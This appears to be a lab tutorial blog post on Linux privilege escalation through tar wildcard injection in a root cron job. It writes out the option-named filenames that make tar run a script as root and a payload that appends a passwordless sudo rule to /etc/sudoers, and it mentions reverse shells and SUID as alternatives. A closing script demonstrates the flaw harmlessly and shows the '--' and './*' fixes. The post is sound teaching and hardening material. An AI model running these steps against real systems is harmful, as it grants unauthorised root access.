Linux Privilege Escalation: Wildcards with tar

Ben Folland
4 min read · May 13, 2023

I recently came across a creative Linux privilege escalation vector that abuses the way the shell expands the wildcard operator (*) before a command such as tar ever runs.

It can be exploited in a few distinct situations, but I'll walk through the case of a cron job running as root that executes a bash script which calls tar with a wildcard. Let's begin.

To start we can view our permissions and the user we are currently running as:

We can see we are running as the user 'kali', who has no sudo privileges. Viewing the crontabs configured on my lab machine, I observe the following:

The last crontab entry runs as the user 'root' and executes a bash script, 'compressToBackup.sh', located in the folder 'TarWildCardPrivEsc' on the 'kali' user's desktop. Inspecting this folder, we can see it contains the following files:

The user 'kali' has read permission on 'compressToBackup.sh', so let's inspect the script.

Vulnerable bash script

#!/bin/bash
cd /home/kali/Desktop/TarWildCardPrivEsc/
tar -zcf /home/kali/Desktop/TarWildCardPrivEsc/backup.tgz *

At first glance this may seem like a totally safe, unmalicious script... right? It just changes the current directory to '/home/.../TarWildCardPrivEsc' and then runs 'tar -zcf /home/kali/Desktop/TarWildCardPrivEsc/backup.tgz *' to compress all the contents of the TarWildCardPrivEsc directory into backup.tgz.

The single symbol '*' is what turns this seemingly safe script into an easy PE vector. The wildcard is never passed to tar at all: bash expands it first, so what tar actually receives is this:

tar -zcf /home/.../TarWildCardPrivEsc/backup.tgz image.png randomfile.txt ... 31337h4ck3r8.zip

In other words, the wildcard is replaced by a sorted list of every (non-hidden) filename in the current directory, and since GNU tar accepts options anywhere on its command line, not only before the file operands, an attacker who can create files in that directory can give them names that tar will parse as options instead of as files.

We can use 'tar --help' to see which options we could smuggle in through fake filenames.

Researching these options further, you will discover that the '--checkpoint-action' option can execute arbitrary commands.

For example see the below code demonstrating some possibilities:

tar -zcf /home/backup.tgz toBeBackedUp --checkpoint=1 --checkpoint-action=exec=whoami

or

tar -zcf /home/backup.tgz toBeBackedUp --checkpoint=1 --checkpoint-action=exec=sh privesc.sh

Both commands above use the exec action of --checkpoint-action to run a command from within tar; --checkpoint=1 makes tar reach a checkpoint after every record it writes, so the action fires even for a tiny archive. This is how we'll abuse it:

# 1. Create two empty files in the current directory whose names are tar options:
#    '--checkpoint=1' and '--checkpoint-action=exec=sh privesc.sh'

echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh privesc.sh'

# 2. Create privesc.sh in the same directory. tar hands the exec= command to
#    /bin/sh -c, so it is run as 'sh privesc.sh' and needs no shebang or execute bit.
# privesc.sh:
echo 'kali ALL=(root) NOPASSWD: ALL' >> /etc/sudoers

# The above appends an entry to /etc/sudoers that allows the 'kali' user to run
# any command with sudo without a password. Append (>>) rather than redirect (>):
# a single '>' would truncate the existing sudoers file and wipe every other rule.
# NOTE: a reverse shell would work just as well here!
# OR: more creatively, use chmod to set the SUID bit on a binary and PE that way.

Now we wait a minute. The cron job runs as 'root' and executes the bash script, which in turn runs tar with the wildcard * to compress everything in the 'TarWildCardPrivEsc' directory. The filenames '--checkpoint=1' and '--checkpoint-action=exec=sh privesc.sh', swept up by the wildcard, are not treated as filenames but as options to tar, and those options make tar execute privesc.sh as root. privesc.sh then grants my user 'kali' passwordless sudo. Now checking my sudo capabilities:

We can now see that we have successfully escalated our privileges to root!
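The whole chain, as an added example that is not part of the original post: a shell script that reproduces the injection in a scratch directory as an unprivileged user (the payload only drops a marker file instead of editing sudoers), then runs the same backup command written two safe ways. It assumes GNU tar is installed (the --checkpoint-action option is a GNU extension) and omits -z so it does not depend on gzip; the argument parsing that makes the attack work is unaffected by that.

```shell
#!/bin/sh
# Added demonstration, not code from the original post. Reproduces the tar
# wildcard injection in a throw-away directory as the current user (no cron,
# no root), then shows that the same glob cannot inject options once the
# command is written as 'tar -cf backup.tgz -- *' or 'tar -cf backup.tgz ./*'.
# Assumptions: GNU tar is on PATH; -z is omitted so gzip is not required.
set -u

# Builds the directory layout from the post (two option-shaped filenames and a
# payload script) and runs one variant of the backup command inside it.
# $1: "vuln" (the post's command), "dashdash" (-- before *) or "dotslash" (./*).
# Prints "executed" if the payload ran, "not executed" otherwise.
run_backup() {
    variant="$1"
    dir="$(mktemp -d)"
    (
        cd "$dir" || exit 1
        # GNU tar (argp) permutes options and operands unless this is set;
        # unset it so the "vuln" case behaves like a default cron environment.
        unset POSIXLY_CORRECT

        echo "legit data" > randomfile.txt
        # The payload. The post's version appends a sudoers rule as root; this
        # one only drops a marker file so the run is observable and harmless.
        printf '%s\n' 'touch pwned.marker' > privesc.sh
        # The option-shaped filenames. Their contents are irrelevant: the
        # names are what tar will parse.
        : > '--checkpoint=1'
        : > '--checkpoint-action=exec=sh privesc.sh'

        case "$variant" in
            vuln)     tar -cf backup.tgz * 2>/dev/null || : ;;
            dashdash) tar -cf backup.tgz -- * 2>/dev/null || : ;;
            dotslash) tar -cf backup.tgz ./* 2>/dev/null || : ;;
            *)        echo "unknown variant: $variant" >&2; exit 2 ;;
        esac

        if [ -e pwned.marker ]; then
            echo "executed"
        else
            echo "not executed"
        fi
    )
    rm -rf "$dir"
}

# Show which form of the command lets the filename payload run.
for v in vuln dashdash dotslash; do
    printf '%-9s -> %s\n' "$v" "$(run_backup "$v")"
done
```

The last two variants are the fix a practitioner should apply to the cron script itself: either end option parsing with -- before the glob, or write the glob as ./* so every expanded name starts with ./ and can never look like an option. Quoting the wildcard would not help, since the expansion is the whole point of the command; and because * skips dotfiles, the attacker's files must be ordinary visible names, which is exactly what the post creates.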
